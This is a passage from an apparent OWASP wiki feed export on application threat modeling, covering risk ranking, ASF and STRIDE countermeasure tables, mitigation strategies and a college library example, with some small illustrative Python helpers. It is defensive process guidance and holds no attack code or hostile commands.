The following is a set of considerations for determining ease of exploitation: &lt;br /&gt;
# Can an attacker exploit this remotely? &lt;br /&gt;
# Does the attacker need to be authenticated?&lt;br /&gt;
# Can the exploit be automated?&lt;br /&gt;
&lt;br /&gt;
The impact mainly depends on the damage potential and the extent of the impact, such as the number of components that are affected by a threat. &lt;br /&gt;
&lt;br /&gt;
Examples to determine the damage potential are:&lt;br /&gt;
# Can an attacker completely take over and manipulate the system?  &lt;br /&gt;
# Can an attacker gain administration access to the system?&lt;br /&gt;
# Can an attacker crash the system? &lt;br /&gt;
# Can the attacker obtain access to sensitive information such as secrets or PII?&lt;br /&gt;
&lt;br /&gt;
Examples to determine the number of components that are affected by a threat:&lt;br /&gt;
# How many data sources and systems can be impacted?&lt;br /&gt;
# How “deep” into the infrastructure can the threat agent go?&lt;br /&gt;
&lt;br /&gt;
These examples help in the calculation of the overall risk values by assigning qualitative values such as High, Medium, and Low to the Likelihood and Impact factors. Using qualitative values, rather than numeric ones as in the DREAD model, helps avoid the ranking becoming overly subjective.&lt;br /&gt;
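As an illustrative sketch (the guide itself prescribes no specific matrix), the qualitative Likelihood and Impact ratings can be combined into an overall risk level through a simple lookup matrix:&lt;br /&gt;

```python
# Hypothetical risk matrix for Risk = Likelihood x Impact with
# qualitative values; the exact cell assignments are an assumption.
LEVELS = {"Low": 0, "Medium": 1, "High": 2}
RISK_MATRIX = [
    # Impact:  Low       Medium    High
    ["Low",    "Low",    "Medium"],   # Likelihood: Low
    ["Low",    "Medium", "High"],     # Likelihood: Medium
    ["Medium", "High",   "High"],     # Likelihood: High
]

def overall_risk(likelihood: str, impact: str) -> str:
    """Combine qualitative Likelihood and Impact into an overall risk level."""
    return RISK_MATRIX[LEVELS[likelihood]][LEVELS[impact]]
```

For example, a threat that is easy to exploit remotely (High likelihood) and can crash the system (High impact) lands in the High cell.&lt;br /&gt;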
&lt;br /&gt;
==Countermeasure Identification==&lt;br /&gt;
The purpose of countermeasure identification is to determine if there is some kind of protective measure (e.g. security control, policy measure) in place that can prevent each threat previously identified via threat analysis from being realized. Vulnerabilities are then those threats that have no countermeasures. Since each of these threats has been categorized either with STRIDE or ASF, it is possible to find appropriate countermeasures in the application within the given category. &lt;br /&gt;
&lt;br /&gt;
Provided below is a brief checklist, by no means exhaustive, for identifying countermeasures for specific threats. &lt;br /&gt;
 &lt;br /&gt;
Examples of countermeasures for ASF threat types are included in the following table: &lt;br /&gt;
&lt;br /&gt;
&amp;lt;table align=&amp;quot;center&amp;quot; cellspacing=&amp;quot;1&amp;quot; CELLPADDING=&amp;quot;7&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;tr bgcolor=&amp;quot;#cccccc&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;th colspan=&amp;quot;4&amp;quot; align=&amp;quot;center&amp;quot;&amp;gt;ASF Threat &amp;amp; Countermeasures List&amp;lt;/th&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;tr bgcolor=&amp;quot;#cccccc&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;th&amp;gt;Threat Type&amp;lt;/th&amp;gt;&lt;br /&gt;
&amp;lt;th&amp;gt;Countermeasure&amp;lt;/th&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;tr bgcolor=&amp;quot;#cccccc&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;Authentication&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;&lt;br /&gt;
#Credentials and authentication tokens are protected with encryption in storage and transit&lt;br /&gt;
#Protocols are resistant to brute force, dictionary, and replay attacks&lt;br /&gt;
#Strong password policies are enforced&lt;br /&gt;
#Trusted server authentication is used instead of SQL authentication&lt;br /&gt;
#Passwords are stored with salted hashes&lt;br /&gt;
#Password resets do not reveal password hints and valid usernames&lt;br /&gt;
#Account lockouts do not result in a denial of service attack&lt;br /&gt;
&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;tr bgcolor=&amp;quot;#cccccc&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;Authorization&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;&lt;br /&gt;
#Strong ACLs are used for enforcing authorized access to resources&lt;br /&gt;
#Role-based access controls are used to restrict access to specific operations&lt;br /&gt;
#The system follows the principle of least privilege for user and service accounts&lt;br /&gt;
#Privilege separation is correctly configured within the presentation, business and data access layers&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;tr bgcolor=&amp;quot;#cccccc&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;Configuration Management&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;&lt;br /&gt;
#Least privileged processes are used and service accounts with no administration capability&lt;br /&gt;
#Auditing and logging of all administration activities is enabled&lt;br /&gt;
#Access to configuration files and administrator interfaces is restricted to administrators&lt;br /&gt;
&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr bgcolor=&amp;quot;#cccccc&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;Data Protection in Storage and Transit&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;&lt;br /&gt;
#Standard encryption algorithms and correct key sizes are being used&lt;br /&gt;
#Hashed message authentication codes (HMACs) are used to protect data integrity&lt;br /&gt;
#Secrets (e.g. keys, confidential data ) are cryptographically protected both in transport and in storage&lt;br /&gt;
#Built-in secure storage is used for protecting keys&lt;br /&gt;
#No credentials and sensitive data are sent in clear text over the wire&lt;br /&gt;
&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr bgcolor=&amp;quot;#cccccc&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;Data Validation / Parameter Validation&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;&lt;br /&gt;
#Data type, format, length, and range checks are enforced&lt;br /&gt;
#All data sent from the client is validated&lt;br /&gt;
#No security decision is based upon parameters (e.g. URL parameters) that can be manipulated&lt;br /&gt;
#Input filtering via white list validation is used&lt;br /&gt;
#Output encoding is used&lt;br /&gt;
&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr bgcolor=&amp;quot;#cccccc&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;Error Handling and Exception Management&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;&lt;br /&gt;
#All exceptions are handled in a structured manner&lt;br /&gt;
#Privileges are restored to the appropriate level in case of errors and exceptions&lt;br /&gt;
#Error messages are scrubbed so that no sensitive information is revealed to the attacker&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr bgcolor=&amp;quot;#cccccc&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;User and Session Management&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;&lt;br /&gt;
#No sensitive information is stored in clear text in the cookie&lt;br /&gt;
#The contents of authentication cookies are encrypted&lt;br /&gt;
#Cookies are configured to expire&lt;br /&gt;
#Sessions are resistant to replay attacks&lt;br /&gt;
#Secure communication channels are used to protect authentication cookies&lt;br /&gt;
#User is forced to re-authenticate when performing critical functions&lt;br /&gt;
#Sessions are expired at logout&lt;br /&gt;
&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr bgcolor=&amp;quot;#cccccc&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;Auditing and Logging&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;&lt;br /&gt;
#Sensitive information (e.g. passwords, PII) is not logged&lt;br /&gt;
#Access controls (e.g. ACLs) are enforced on log files to prevent unauthorized access&lt;br /&gt;
#Integrity controls (e.g. signatures) are enforced on log files to provide non-repudiation&lt;br /&gt;
#Log files provide an audit trail for sensitive operations and logging of key events&lt;br /&gt;
#Auditing and logging is enabled across the tiers on multiple servers&lt;br /&gt;
&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;/table&amp;gt;&lt;br /&gt;
&lt;br /&gt;
When using STRIDE, the following threat-mitigation table can be used to identify techniques that can be employed to mitigate the threats.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;table align=&amp;quot;center&amp;quot; cellspacing=&amp;quot;1&amp;quot; CELLPADDING=&amp;quot;7&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;tr bgcolor=&amp;quot;#cccccc&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;th colspan=&amp;quot;4&amp;quot; align=&amp;quot;center&amp;quot;&amp;gt;STRIDE Threat &amp;amp; Mitigation Techniques List&amp;lt;/th&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;tr bgcolor=&amp;quot;#cccccc&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;th&amp;gt;Threat Type&amp;lt;/th&amp;gt;&lt;br /&gt;
&amp;lt;th&amp;gt;Mitigation Techniques&amp;lt;/th&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;tr bgcolor=&amp;quot;#cccccc&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;Spoofing Identity&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;&lt;br /&gt;
#Appropriate authentication&lt;br /&gt;
#Protect secret data&lt;br /&gt;
#Don't store secrets&lt;br /&gt;
&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr bgcolor=&amp;quot;#cccccc&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;Tampering with data&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;&lt;br /&gt;
#Appropriate authorization&lt;br /&gt;
#Hashes&lt;br /&gt;
#MACs&lt;br /&gt;
#Digital signatures&lt;br /&gt;
#Tamper resistant protocols&lt;br /&gt;
&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr bgcolor=&amp;quot;#cccccc&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;Repudiation&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;&lt;br /&gt;
#Digital signatures&lt;br /&gt;
#Timestamps&lt;br /&gt;
#Audit trails&lt;br /&gt;
&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr bgcolor=&amp;quot;#cccccc&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;Information Disclosure&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;&lt;br /&gt;
#Authorization&lt;br /&gt;
#Privacy-enhanced protocols&lt;br /&gt;
#Encryption&lt;br /&gt;
#Protect secrets&lt;br /&gt;
#Don't store secrets&lt;br /&gt;
&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr bgcolor=&amp;quot;#cccccc&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;Denial of Service&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;&lt;br /&gt;
#Appropriate authentication&lt;br /&gt;
#Appropriate authorization&lt;br /&gt;
#Filtering&lt;br /&gt;
#Throttling&lt;br /&gt;
#Quality of service&lt;br /&gt;
&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr bgcolor=&amp;quot;#cccccc&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;Elevation of privilege&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;&lt;br /&gt;
#Run with least privilege&lt;br /&gt;
&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;/table&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Once threats and corresponding countermeasures are identified, it is possible to derive a threat profile with the following criteria:&lt;br /&gt;
&lt;br /&gt;
# '''Non-mitigated threats:''' Threats that have no countermeasures and represent vulnerabilities that can be fully exploited to cause an impact &lt;br /&gt;
# '''Partially mitigated threats:''' Threats partially mitigated by one or more countermeasures, representing vulnerabilities that can only be partially exploited and cause a limited impact &lt;br /&gt;
# '''Fully mitigated threats:''' Threats that have appropriate countermeasures in place and do not expose vulnerabilities or cause an impact&lt;br /&gt;
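The three criteria above can be sketched as a simple classification over countermeasure coverage; the coverage counts and threat names used here are hypothetical:&lt;br /&gt;

```python
def classify_threats(coverage: dict) -> dict:
    """Derive a threat profile from countermeasure coverage.

    coverage maps a threat name to a pair
    (countermeasures_in_place, countermeasures_needed).
    """
    profile = {"non-mitigated": [], "partially mitigated": [],
               "fully mitigated": []}
    for threat, (in_place, needed) in coverage.items():
        if in_place == 0:
            profile["non-mitigated"].append(threat)        # a vulnerability
        elif needed > in_place:
            profile["partially mitigated"].append(threat)  # limited impact
        else:
            profile["fully mitigated"].append(threat)
    return profile
```

The non-mitigated bucket is exactly the set of vulnerabilities the preceding section defines: threats with no countermeasure in place.&lt;br /&gt;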
&lt;br /&gt;
===Mitigation Strategies===&lt;br /&gt;
The objective of risk management is to reduce the impact that the exploitation of a threat can have on the application. This can be done by responding to a threat with a risk mitigation strategy. In general, there are five options to mitigate threats: &lt;br /&gt;
# '''Do nothing:''' for example, hoping for the best&lt;br /&gt;
# '''Informing about the risk:''' for example, warning user population about the risk&lt;br /&gt;
# '''Mitigate the risk:''' for example, by putting countermeasures in place&lt;br /&gt;
# '''Accept the risk:''' for example, after evaluating the impact of the exploitation (business impact)&lt;br /&gt;
# '''Transfer the risk:''' for example, through contractual agreements and insurance&lt;br /&gt;
&lt;br /&gt;
The decision of which strategy is most appropriate depends on the impact an exploitation of a threat can have, the likelihood of its occurrence, and the costs for transferring (i.e. costs for insurance) or avoiding (i.e. costs or losses due to redesign) it. In other words, such a decision is based on the risk a threat poses to the system. Therefore, the chosen strategy does not mitigate the threat itself but the risk it poses to the system. Ultimately, the overall risk has to take into account the business impact, since this is a critical factor for the business risk management strategy. One strategy could be to fix only the vulnerabilities for which the cost to fix is less than the potential business impact derived from the exploitation of the vulnerability. Another strategy could be to accept the risk when the loss of some security controls (e.g. Confidentiality, Integrity, and Availability) implies only a small degradation of the service, and not the loss of a critical business function. In some cases, transferring the risk to another service provider might also be an option. &lt;br /&gt;
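The cost-versus-impact reasoning above can be sketched as a small decision helper; the threshold logic and strategy labels are assumptions for illustration, not a prescription from the guide:&lt;br /&gt;

```python
def choose_strategy(fix_cost: float, business_impact: float,
                    transferable: bool = False) -> str:
    """Pick a mitigation strategy by weighing fix cost against business impact.

    Illustrative only: real decisions also weigh likelihood and whether a
    critical business function is at stake.
    """
    if business_impact > fix_cost:
        return "mitigate the risk"   # fixing is cheaper than absorbing the loss
    if transferable:
        return "transfer the risk"   # e.g. insurance or another service provider
    return "accept the risk"         # the impact does not justify the fix cost
```

For example, a vulnerability costing 10 to fix against a potential impact of 100 would be mitigated, while the reverse case would be accepted or, if possible, transferred.&lt;br /&gt;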
&lt;br /&gt;
[[Category:OWASP Code Review Project]]&lt;/div&gt;</summary>
		<author><name>KirstenS</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Application_Threat_Modeling&amp;diff=60014</id>
		<title>Application Threat Modeling</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Application_Threat_Modeling&amp;diff=60014"/>
				<updated>2009-05-04T14:51:38Z</updated>
		
		<summary type="html">&lt;p&gt;KirstenS: /* STRIDE */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[[OWASP Code Review Guide Table of Contents]]__TOC__&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
===Introduction===&lt;br /&gt;
Threat modeling is an approach for analyzing the security of an application. It is a structured approach that enables you to identify, quantify, and address the security risks associated with an application. Threat modeling is not an approach to reviewing code, but it does complement the security code review process. The inclusion of threat modeling in the SDLC can help to ensure that applications are being developed with security built in from the very beginning. This, combined with the documentation produced as part of the threat modeling process, can give the reviewer a greater understanding of the system. This allows the reviewer to see where the entry points to the application are and the threats associated with each entry point. The concept of threat modeling is not new, but there has been a clear mindset change in recent years. Modern threat modeling looks at a system from a potential attacker's perspective, as opposed to a defender's viewpoint. Microsoft has been a strong advocate of the process over the past number of years. It has made threat modeling a core component of its SDLC, which it claims to be one of the reasons for the increased security of its products in recent years. &lt;br /&gt;
&lt;br /&gt;
When source code analysis is performed outside the SDLC, such as on existing applications, the results of the threat modeling help reduce the complexity of the source code analysis by promoting a depth-first approach over a breadth-first approach. Instead of reviewing all source code with equal focus, you can prioritize the security code review of components that threat modeling has ranked as posing high-risk threats. &lt;br /&gt;
&lt;br /&gt;
The threat modeling process can be decomposed into 3 high level steps:&lt;br /&gt;
&lt;br /&gt;
'''Step 1:''' Decompose the Application. &lt;br /&gt;
The first step in the threat modeling process is concerned with gaining an understanding of the application and how it interacts with external entities. This involves creating use-cases to understand how the application is used, identifying entry points to see where a potential attacker could interact with the application, identifying assets i.e. items/areas that the attacker would be interested in, and identifying trust levels which represent the access rights that the application will grant to external entities. This information is documented in the Threat Model document and it is also used to produce data flow diagrams (DFDs) for the application. The DFDs show the different paths through the system, highlighting the privilege boundaries. &lt;br /&gt;
&lt;br /&gt;
'''Step 2:''' Determine and rank threats.&lt;br /&gt;
Critical to the identification of threats is using a threat categorization methodology. A threat categorization such as STRIDE can be used, or the Application Security Frame (ASF), which defines threat categories such as Auditing &amp;amp; Logging, Authentication, Authorization, Configuration Management, Data Protection in Storage and Transit, Data Validation, and Exception Management. The goal of the threat categorization is to help identify threats both from the attacker's perspective (STRIDE) and the defensive perspective (ASF). DFDs produced in step 1 help to identify the potential threat targets from the attacker's perspective, such as data sources, processes, data flows, and interactions with users. These threats can be identified further as the roots of threat trees; there is one tree for each threat goal. From the defensive perspective, ASF categorization helps to identify the threats as weaknesses of the security controls for such threats. Common threat lists with examples can help in the identification of such threats. Use and abuse cases can illustrate how existing protective measures could be bypassed, or where a lack of such protection exists. The security risk for each threat can be determined using a value-based risk model such as DREAD, or a less subjective qualitative risk model based upon general risk factors (e.g. likelihood and impact).&lt;br /&gt;
&lt;br /&gt;
'''Step 3:''' Determine countermeasures and mitigation.&lt;br /&gt;
A lack of protection of a threat might indicate a vulnerability whose risk exposure could be mitigated with the implementation of a countermeasure. Such countermeasures can be identified using threat-countermeasure mapping lists. Once a risk ranking is assigned to the threats, it is possible to sort threats from the highest to the lowest risk, and prioritize the mitigation effort, such as by responding to such threats by applying the identified countermeasures. The risk mitigation strategy might involve evaluating these threats from the business impact that they pose and reducing  the risk. Other options might include taking the risk, assuming the business impact is acceptable because of compensating controls, informing the user of the threat, removing the risk posed by the threat completely, or the least preferable option, that is, to do nothing. &lt;br /&gt;
&lt;br /&gt;
Each of the above steps is documented as it is carried out. The resulting document is the threat model for the application. This guide will use an example to help explain the concepts behind threat modeling: a college library website. The same example will be used throughout each of the 3 steps as a learning aid. At the end of the guide we will have produced the threat model for the college library website. Each of the steps in the threat modeling process is described in detail below.&lt;br /&gt;
&lt;br /&gt;
== Decompose the Application ==&lt;br /&gt;
The goal of this step is to gain an understanding of the application and how it interacts with external entities. This goal is achieved by information gathering and documentation. The information gathering process is carried out using a clearly defined structure, which ensures the correct information is collected. This structure also defines how the information should be documented to produce the Threat Model. &lt;br /&gt;
&lt;br /&gt;
==Threat Model Information==&lt;br /&gt;
The first item in the threat model is the information relating to the threat model. &lt;br /&gt;
This must include the following:&lt;br /&gt;
&lt;br /&gt;
# '''Application Name''' - The name of the application.&lt;br /&gt;
# '''Application Version''' - The version of the application.&lt;br /&gt;
# '''Description''' - A high level description of the application.&lt;br /&gt;
# '''Document Owner''' - The owner of the threat modeling document. &lt;br /&gt;
# '''Participants''' - The participants involved in the threat modeling process for this application.&lt;br /&gt;
# '''Reviewer''' - The reviewer(s) of the threat model.&amp;lt;br/&amp;gt;&lt;br /&gt;
Example:&amp;lt;br/&amp;gt;&lt;br /&gt;
[[Category:FIXME|the list above includes an Application name, but the example does not have one]]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;table align=&amp;quot;center&amp;quot; cellspacing=&amp;quot;1&amp;quot; CELLPADDING=&amp;quot;7&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;tr bgcolor=&amp;quot;#cccccc&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;th colspan=&amp;quot;2&amp;quot; align=&amp;quot;center&amp;quot;&amp;gt;Threat Model Information&amp;lt;/th&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;tr bgcolor=&amp;quot;#cccccc&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;th align=&amp;quot;left&amp;quot;&amp;gt;Application Version:&amp;lt;/th&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;1.0&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;tr bgcolor=&amp;quot;#dddddd&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;th align=&amp;quot;left&amp;quot;&amp;gt; Description:&amp;lt;/th&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;The college library website is the first implementation of a website to provide librarians and library patrons (students and college staff) with online services. &lt;br /&gt;
As this is the first implementation of the website, the functionality will be limited. There will be three types of users of the application: &amp;lt;br/&amp;gt;&lt;br /&gt;
1. Students&amp;lt;br/&amp;gt;&lt;br /&gt;
2. Staff&amp;lt;br/&amp;gt;&lt;br /&gt;
3. Librarians&amp;lt;br/&amp;gt;&lt;br /&gt;
Staff and students will be able to log in and search for books, and staff members can request books. Librarians will be able to log in, add books, add users, and search for books.&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;tr bgcolor=&amp;quot;#cccccc&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;th align=&amp;quot;left&amp;quot;&amp;gt;Document Owner:&amp;lt;/th&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;David Lowry&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;tr bgcolor=&amp;quot;#dddddd&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;th align=&amp;quot;left&amp;quot;&amp;gt;Participants:&amp;lt;/th&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;David Rook&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;tr bgcolor=&amp;quot;#cccccc&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;th align=&amp;quot;left&amp;quot;&amp;gt;Reviewer:&amp;lt;/th&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;Eoin Keary&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/table&amp;gt;&lt;br /&gt;
&amp;lt;br/&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==External Dependencies==&lt;br /&gt;
External dependencies are items external to the code of the application that may pose a threat to the application. These items are typically still within the control of the organization, but possibly not within the control of the development team. The first area to look at when investigating external dependencies is how the application will be deployed in a production environment, and what requirements surround this. This involves looking at how the application is or is not intended to be run. For example, if the application is expected to run on a server that has been hardened to the organization's hardening standard, and it is expected to sit behind a firewall, then this information should be documented in the external dependencies section. External dependencies should be documented as follows:&lt;br /&gt;
&lt;br /&gt;
# '''ID''' - A unique ID assigned to the external dependency.&lt;br /&gt;
# '''Description''' - A textual description of the external dependency.&lt;br /&gt;
&amp;lt;br/&amp;gt;&lt;br /&gt;
Example:&lt;br /&gt;
&amp;lt;br/&amp;gt;&lt;br /&gt;
&amp;lt;table align=&amp;quot;center&amp;quot; cellspacing=&amp;quot;1&amp;quot; CELLPADDING=&amp;quot;7&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;tr bgcolor=&amp;quot;#cccccc&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;th colspan=&amp;quot;2&amp;quot; align=&amp;quot;center&amp;quot;&amp;gt;External Dependencies&amp;lt;/th&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;tr bgcolor=&amp;quot;#cccccc&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;th&amp;gt;ID&amp;lt;/th&amp;gt;&lt;br /&gt;
&amp;lt;th&amp;gt;Description&amp;lt;/th&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;tr bgcolor=&amp;quot;#dddddd&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;1&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;The college library website will run on a Linux server running Apache.  This server will be hardened as per the college's server hardening standard. This includes the application of the latest operating system and application security patches.&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;tr bgcolor=&amp;quot;#cccccc&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;2&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;The database server will be MySQL and it will run on a Linux server. This server will be hardened as per the college's server hardening standard. This will include the application of the latest operating system and application security patches.&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;tr bgcolor=&amp;quot;#dddddd&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;3&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;The connection between the Web Server and the database server will be over a private network.&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;tr bgcolor=&amp;quot;#cccccc&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;4&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;The Web Server is behind a firewall, and the only communication allowed is TLS.&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/table&amp;gt;&lt;br /&gt;
&amp;lt;br/&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==Entry Points==&lt;br /&gt;
Entry points define the interfaces through which potential attackers can interact with the application or supply it with data. For a potential attacker to attack an application, entry points must exist. Entry points in an application can be layered; for example, each web page in a web application may contain multiple entry points. Entry points should be documented as follows: &lt;br /&gt;
&lt;br /&gt;
#  '''ID''' - A unique ID assigned to the entry point. This will be used to cross-reference the entry point with any threats or vulnerabilities that are identified. In the case of layered entry points, a major.minor notation should be used.&lt;br /&gt;
# '''Name''' - A descriptive name identifying the entry point and its purpose.&lt;br /&gt;
# '''Description''' - A textual description detailing the interaction or processing that occurs at the entry point.&lt;br /&gt;
# '''Trust Levels''' - The level of access required at the entry point is documented here. These will be cross-referenced with the trust levels defined later in the document.&lt;br /&gt;
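The four fields above can be captured in a small record type; the field names mirror the list, and the sample values below are hypothetical:&lt;br /&gt;

```python
from dataclasses import dataclass, field

# Sketch of an entry-point record matching the four documented fields.
# The major.minor ID is kept as a string (e.g. "1.2") so that layering
# under a parent entry point is preserved.
@dataclass
class EntryPoint:
    id: str                  # e.g. "1.2" for a page layered under entry point 1
    name: str
    description: str
    trust_levels: list = field(default_factory=list)

login = EntryPoint(
    "1.2", "Login Page",
    "Users must log in before carrying out any use case.",
    ["Anonymous Web User", "User with Valid Login Credentials"],
)
```

A threat found later can then be cross-referenced to `login.id` rather than to a page name that may change.&lt;br /&gt;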
&amp;lt;br/&amp;gt;&lt;br /&gt;
Example:&lt;br /&gt;
&amp;lt;br/&amp;gt;&lt;br /&gt;
&amp;lt;table align=&amp;quot;center&amp;quot; cellspacing=&amp;quot;1&amp;quot; CELLPADDING=&amp;quot;7&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;tr bgcolor=&amp;quot;#cccccc&amp;quot;&amp;gt;&lt;br /&gt;
